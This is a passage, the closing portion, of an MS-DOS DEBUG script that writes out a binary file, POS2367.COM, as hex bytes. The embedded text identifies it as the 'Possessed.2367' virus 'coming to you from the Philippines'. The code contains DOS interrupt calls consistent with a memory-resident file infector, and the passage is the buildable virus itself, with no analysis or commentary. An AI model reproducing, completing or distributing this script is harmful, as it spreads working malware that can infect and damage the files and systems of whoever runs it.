E 0720 00 B9 1C 00 33 D2 B4 40 E8 31 00 0E 1F 8B 16 7B
E 0730 00 8B 0E 7D 00 B8 00 42 E8 21 00 BA 00 00 B9 3F
E 0740 09 B4 40 E8 16 00 E9 5B FD 33 C0 8E C0 26 8E 16
E 0750 F6 01 26 8B 26 F4 01 58 07 5D F9 C3 55 06 50 33
E 0760 C0 8E C0 26 89 26 F4 01 26 8C 16 F6 01 58 07 9C
E 0770 2E FF 1E 4F 00 5D C3 33 C9 8B D1 B8 00 42 E8 DB
E 0780 FF C3 B4 02 33 DB CD 10 C3 51 56 28 04 46 E2 FB
E 0790 5E 59 C3 56 51 FC F3 A6 74 01 F9 59 5E C3 5A 66
E 07A0 64 64 58 65 5B 45 5A 66 64 32 75 74 78 78 6A 78
E 07B0 78 6A 69 46 45 67 9C 86 46 45 8D 86 46 45 8D 86
E 07C0 46 45 8D 86 46 45 8D 86 46 49 2D 45 2F 32 66 9A
E 07D0 99 8D 94 97 5F 45 6F 94 93 6F 94 93 45 6C 9A 92
E 07E0 87 86 45 94 8B 45 66 89 7A 2F 3F 41 4B 42 4B 42
E 07F0 4C 43 4C 44 4C 45 4C 43 4D 46 4D 47 4D 44 4E 48
E 0800 4E 49 4E 4A 4E 45 4F 4B 4F 4C 4F B6 4A B5 4A B5
E 0810 4B B4 4B B3 4B B2 4B B4 4C B1 4C B0 4C B3 4D AF
E 0820 4D AE 4D AD 4D B2 4E AC 4E AB 4E 4C 54 4C 55 4D
E 0830 55 4E 55 4F 56 50 56 51 56 52 56 53 56 54 57 55
E 0840 57 56 57 57 57 58 57 59 58 5A 58 5B 58 5C 58 5D
E 0850 58 5A 59 5B 59 5C 59 5D 59 60 59 5F 59 60 59 61
E 0860 59 62 59 5B 5A 5C 5A 63 5A 64 5A 65 5A 66 5A 67
E 0870 5A 5C 5B 68 5B 69 5B 6A 5B 6B 5B 6C 5B 6D 5C 6E
E 0880 5C 6F 5C 70 5D B1 53 B0 54 AF 54 AE 54 AD 55 AC
E 0890 55 AB 55 AA 55 A9 55 A8 55 A7 56 A6 56 A5 56 A4
E 08A0 56 A3 56 A2 57 A1 57 A0 57 9F 57 9E 57 9D 57 9C
E 08B0 58 9B 58 9A 58 99 58 98 58 9A 59 99 59 98 59 97
E 08C0 59 96 59 95 59 94 59 93 59 92 59 99 5A 98 5A 91
E 08D0 5A 90 5A 8F 5A 8E 5A 8D 5A 98 5B 8C 5B 8B 5B 8A
E 08E0 5B 89 5B 88 5B 87 5B 86 5C 85 5C 84 5C 83 5C 76
E 08F0 63 75 64 75 65 74 66 74 67 73 68 73 69 72 6A 71
E 0900 6B 71 6C 70 6D 70 6E 6F 6F 6E 70 6E 71 7B 71 6D
E 0910 72 7A 72 79 72 6D 73 78 73 77 73 76 73 75 73 6C
E 0920 74 71 74 72 74 73 74 74 74 6C 75 6D 75 6E 75 6F
E 0930 75 70 75 6B 76 6C 76 6D 81 6E 81 6F 81 70 80 71
E 0940 80 72 80 73 80 74 7F 75 7F 76 7F 77 7F 78 7E 79
E 0950 7E 7A 7E 7B 7E 7C 7D 7D 7D 7E 7D 7F 7D 80 7D 81
E 0960 7C 82 7C 83 7C 84 7C 85 7B 86 7B 87 7B 88 7B 89
E 0970 7A 8A 7A 8B 7A 8C 7A 8D 79 8E 79 8F 79 90 79 91
E 0980 78 92 78 93 78 94 77 95 77 96 76 97 76 98 75 00
E 0990 06 33 C0 8E C0 26 80 3E EC 01 00 75 06 BE 00 01
E 09A0 E9 E8 01 07 8C C0 2E 03 06 73 01 8E D0 2E 8B 26
E 09B0 75 01 8C C0 2E 03 06 77 01 2E A3 51 01 2E A1 79
E 09C0 01 2E A3 4F 01 F8 2E FF 2E 4F 01 FC F3 A4 33 C0
E 09D0 8E C0 26 C6 06 EC 01 01 58 05 10 00 50 B8 1B 07
E 09E0 50 CB 8B C4 2D 00 01 8B E0 8C C8 8E D8 8E D0 1E
E 09F0 2D 10 00 8E C0 8C 06 81 00 50 26 A1 2C 00 A3 7F
E 0A00 00 58 1E 06 8E D8 0E 07 BE 0A 00 BF 3F 09 B9 06
E 0A10 00 FC F3 A5 BB CD 07 89 1E 0A 00 8C 0E 0C 00 07
E 0A20 1F 07 BE E2 04 B9 42 00 51 B0 25 E8 5B FD BF 08
E 0A30 00 56 FC F3 A4 5E 59 F6 D8 E8 4D FD A1 C9 06 05
E 0A40 1B 02 CD 21 89 1E 4F 00 8C 06 51 00 BA 4A 00 80
E 0A50 EC 10 E8 07 FD C7 06 6B 00 00 00 8A 16 6E 00 88
E 0A60 16 6D 00 05 E7 0F E8 F3 FC 89 1E 53 00 8C 06 55
E 0A70 00 BA 2E 03 80 EC 10 E8 E2 FC 0E 1F 8E 06 81 00
E 0A80 B4 49 E8 D7 FC BA 3F 09 B1 04 D3 EA 83 C2 20 B4
E 0A90 31 E8 C8 FC 0E 0E 1F 8E 06 81 00 BE 3F 09 BF 0A
E 0AA0 00 B9 06 00 FC F3 A5 07 80 3E 4E 00 01 75 08 C6
E 0AB0 06 4E 00 00 E9 97 00 A1 81 00 BE 4E 09 89 44 04
E 0AC0 C7 44 02 80 00 89 44 08 C7 44 06 5C 00 89 44 0C
E 0AD0 C7 44 0A 6C 00 A1 7F 00 89 04 B4 30 CD 21 A2 4D
E 0AE0 00 3C 03 72 1F 8E 1E 7F 00 33 F6 B9 C8 00 80 3C
E 0AF0 01 75 0E 80 7C 03 3A 75 08 8B D6 83 C2 02 EB 15
E 0B00 90 46 E2 EA 0E 1F BE 8F 08 BF 41 09 B9 0D 00 FC
E 0B10 F3 A4 BA 41 09 FA 2E 8C 16 6F 00 2E 89 26 71 00
E 0B20 FB B8 00 4B BB 4E 09 2E 80 3E 4D 00 03 72 06 E8
E 0B30 2A FC EB 03 90 CD 21 FA 2E 8E 16 6F 00 2E 8B 26
E 0B40 71 00 FB 0E 1F 73 07 BA 08 00 B4 09 CD 21 B4 4D
E 0B50 CD 21 B4 4C CD 21 50 4F 53 32 33 36 37 2E 43 4F
E 0B60 4D 00 00 81 C6 00 01 06 33 C0 8E C0 26 83 3E EC
E 0B70 01 00 74 13 07 83 EE 5A BF 00 01 B9 2D 00 FC F3
E 0B80 A5 BB 00 01 F8 FF E3 81 EE 3F 09 07 0E 1F BF 00
E 0B90 01 B9 C4 08 D1 E9 FC F3 A5 B9 7B 00 8C 06 51 01
E 0BA0 C7 06 4F 01 04 08 06 2E FF 2E 4F 01 E9 B7 01 0D
E 0BB0 20 20 20 0D 0A 4D 61 62 75 68 61 79 21 0D 0A 0A
E 0BC0 54 68 69 73 20 69 73 20 50 6F 73 73 65 73 73 65
E 0BD0 64 2E 32 33 36 37 20 76 69 72 75 73 20 63 6F 6D
E 0BE0 69 6E 67 20 74 6F 20 79 6F 75 20 66 72 6F 6D 20
E 0BF0 74 68 65 20 50 68 69 6C 69 70 70 69 6E 65 73 2E
E 0C00 0D 0A 42 72 6F 75
RCX
0B06
W
Q
ÄÄ POS2367.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
EoF.
